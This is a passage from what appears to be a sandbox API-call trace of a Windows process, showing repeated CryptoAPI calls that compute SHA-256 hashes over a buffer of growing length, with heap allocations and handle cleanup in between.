returned 1 [0189.523] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0189.523] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.523] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79860 [0189.523] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32e79860, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e79860, pdwDataLen=0xce12c) returned 1 [0189.524] CryptDestroyHash (hHash=0x3396f430) returned 1 [0189.524] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0189.524] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338233d0) returned 1 [0189.524] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.524] CryptHashData (hHash=0x3396ea90, pbData=0x32348160, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0189.524] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.524] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e79890 [0189.524] CryptGetHashParam (in: hHash=0x3396ea90, dwParam=0x2, pbData=0x32e79890, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e79890, pdwDataLen=0xce12c) returned 1 [0189.524] CryptDestroyHash (hHash=0x3396ea90) returned 1 [0189.524] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0189.524] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338222d0) returned 1 [0189.525] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.525] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x100, dwFlags=0x0) returned 1 [0189.525] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.525] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e798c0 [0189.525] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32e798c0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e798c0, pdwDataLen=0xce12c) returned 1 [0189.525] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0189.525] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0189.525] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338238d0) returned 1 [0189.526] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.526] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0x120, dwFlags=0x0) returned 1 [0189.526] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.526] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e798f0 [0189.526] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32e798f0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e798f0, pdwDataLen=0xce12c) returned 1 [0189.526] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.526] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0189.526] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822ed0) returned 1 [0189.526] CryptCreateHash (in: hProv=0x33822ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.526] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x140, dwFlags=0x0) returned 1 [0189.526] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.526] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e80460 [0189.526] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32e80460, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e80460, pdwDataLen=0xce12c) returned 1 [0189.526] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0189.527] CryptReleaseContext (hProv=0x33822ed0, dwFlags=0x0) returned 1 [0189.527] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821dd0) returned 1 [0189.527] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.527] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0x160, dwFlags=0x0) returned 1 [0189.527] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.527] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f420 [0189.527] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x2, pbData=0x32e6f420, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e6f420, pdwDataLen=0xce12c) returned 1 [0189.527] CryptDestroyHash (hHash=0x3396f190) returned 1 [0189.527] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0189.527] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338237d0) returned 1 [0189.528] CryptCreateHash (in: hProv=0x338237d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.528] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x180, dwFlags=0x0) returned 1 [0189.528] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.528] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e6f7b0 [0189.528] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32e6f7b0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e6f7b0, pdwDataLen=0xce12c) returned 1 [0189.528] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.528] CryptReleaseContext (hProv=0x338237d0, dwFlags=0x0) returned 1 [0189.528] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.528] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.528] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0189.528] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.529] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e704d0 [0189.529] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32e704d0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e704d0, pdwDataLen=0xce12c) returned 1 [0189.529] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.529] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.529] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338229d0) returned 1 [0189.529] CryptCreateHash (in: hProv=0x338229d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.529] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0189.529] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.529] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70380 [0189.529] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32e70380, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e70380, pdwDataLen=0xce12c) returned 1 [0189.529] CryptDestroyHash (hHash=0x3396f120) returned 1 [0189.529] CryptReleaseContext (hProv=0x338229d0, dwFlags=0x0) returned 1 [0189.529] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338238d0) returned 1 [0189.530] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.530] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0189.530] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.530] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70a40 [0189.530] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32e70a40, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e70a40, pdwDataLen=0xce12c) returned 1 [0189.530] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0189.530] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0189.530] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822ad0) returned 1 [0189.531] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.531] CryptHashData (hHash=0x3396ee80, pbData=0x32348160, dwDataLen=0x200, dwFlags=0x0) returned 1 [0189.531] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.531] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70a70 [0189.531] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x2, pbData=0x32e70a70, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e70a70, pdwDataLen=0xce12c) returned 1 [0189.531] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0189.531] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0189.531] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338235d0) returned 1 [0189.531] CryptCreateHash (in: hProv=0x338235d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.531] CryptHashData (hHash=0x3396f350, pbData=0x32348160, dwDataLen=0x220, dwFlags=0x0) returned 1 [0189.531] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.531] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e705f0 [0189.531] CryptGetHashParam (in: hHash=0x3396f350, dwParam=0x2, pbData=0x32e705f0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e705f0, pdwDataLen=0xce12c) returned 1 [0189.531] CryptDestroyHash (hHash=0x3396f350) returned 1 [0189.532] CryptReleaseContext (hProv=0x338235d0, dwFlags=0x0) returned 1 [0189.532] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33823bd0) returned 1 [0189.532] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.532] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x240, dwFlags=0x0) returned 1 [0189.532] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.532] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e70aa0 [0189.532] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32e70aa0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e70aa0, pdwDataLen=0xce12c) returned 1 [0189.532] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.532] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0189.532] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822fd0) returned 1 [0189.538] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.538] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0x260, dwFlags=0x0) returned 1 [0189.538] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.538] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e87ab0 [0189.538] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32e87ab0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32e87ab0, pdwDataLen=0xce12c) returned 1 [0189.538] CryptDestroyHash (hHash=0x3396f200) returned 1 [0189.538] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0189.538] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822fd0) returned 1 [0189.538] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.539] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0x280, dwFlags=0x0) returned 1 [0189.539] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.539] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd020 [0189.539] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32acd020, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd020, pdwDataLen=0xce12c) returned 1 [0189.539] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0189.539] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0189.539] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338233d0) returned 1 [0189.539] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.539] CryptHashData (hHash=0x3396efd0, pbData=0x32348160, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0189.539] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.540] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd710 [0189.540] CryptGetHashParam (in: hHash=0x3396efd0, dwParam=0x2, pbData=0x32acd710, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd710, pdwDataLen=0xce12c) returned 1 [0189.540] CryptDestroyHash (hHash=0x3396efd0) returned 1 [0189.540] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0189.540] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338223d0) returned 1 [0189.540] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.540] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0189.540] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.540] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acce70 [0189.540] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32acce70, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acce70, pdwDataLen=0xce12c) returned 1 [0189.540] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0189.540] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0189.540] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821ed0) returned 1 [0189.541] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.541] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0189.541] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.541] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accba0 [0189.541] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32accba0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accba0, pdwDataLen=0xce12c) returned 1 [0189.541] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.541] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0189.541] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821fd0) returned 1 [0189.542] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.542] CryptHashData (hHash=0x3396f5f0, pbData=0x32348160, dwDataLen=0x300, dwFlags=0x0) returned 1 [0189.542] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.542] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd050 [0189.542] CryptGetHashParam (in: hHash=0x3396f5f0, dwParam=0x2, pbData=0x32acd050, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd050, pdwDataLen=0xce12c) returned 1 [0189.542] CryptDestroyHash (hHash=0x3396f5f0) returned 1 [0189.542] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0189.542] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33823bd0) returned 1 [0189.543] CryptCreateHash (in: hProv=0x33823bd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.543] CryptHashData (hHash=0x3396f200, pbData=0x32348160, dwDataLen=0x320, dwFlags=0x0) returned 1 [0189.543] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.543] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd290 [0189.543] CryptGetHashParam (in: hHash=0x3396f200, dwParam=0x2, pbData=0x32acd290, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd290, pdwDataLen=0xce12c) returned 1 [0189.543] CryptDestroyHash (hHash=0x3396f200) returned 1 [0189.543] CryptReleaseContext (hProv=0x33823bd0, dwFlags=0x0) returned 1 [0189.543] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338232d0) returned 1 [0189.543] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.543] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0x340, dwFlags=0x0) returned 1 [0189.543] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.543] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accc60 [0189.543] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32accc60, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accc60, pdwDataLen=0xce12c) returned 1 [0189.543] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.544] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0189.544] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338238d0) returned 1 [0189.544] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.544] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x360, dwFlags=0x0) returned 1 [0189.544] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.544] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accc90 [0189.544] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32accc90, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accc90, pdwDataLen=0xce12c) returned 1 [0189.544] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.544] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0189.544] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338234d0) returned 1 [0189.545] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.545] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x380, dwFlags=0x0) returned 1 [0189.545] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.545] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd260 [0189.545] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32acd260, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd260, pdwDataLen=0xce12c) returned 1 [0189.545] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.545] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0189.545] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338232d0) returned 1 [0189.546] CryptCreateHash (in: hProv=0x338232d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.546] CryptHashData (hHash=0x3396f120, pbData=0x32348160, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0189.546] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.546] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd440 [0189.546] CryptGetHashParam (in: hHash=0x3396f120, dwParam=0x2, pbData=0x32acd440, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd440, pdwDataLen=0xce12c) returned 1 [0189.546] CryptDestroyHash (hHash=0x3396f120) returned 1 [0189.546] CryptReleaseContext (hProv=0x338232d0, dwFlags=0x0) returned 1 [0189.546] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338234d0) returned 1 [0189.546] CryptCreateHash (in: hProv=0x338234d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.546] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0189.546] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.546] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accf00 [0189.546] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32accf00, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accf00, pdwDataLen=0xce12c) returned 1 [0189.546] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0189.546] CryptReleaseContext (hProv=0x338234d0, dwFlags=0x0) returned 1 [0189.547] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821ed0) returned 1 [0189.547] CryptCreateHash (in: hProv=0x33821ed0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.547] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x3e0, dwFlags=0x0) returned 1 [0189.547] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.547] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accc00 [0189.547] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32accc00, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accc00, pdwDataLen=0xce12c) returned 1 [0189.547] CryptDestroyHash (hHash=0x3396f430) returned 1 [0189.547] CryptReleaseContext (hProv=0x33821ed0, dwFlags=0x0) returned 1 [0189.547] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: 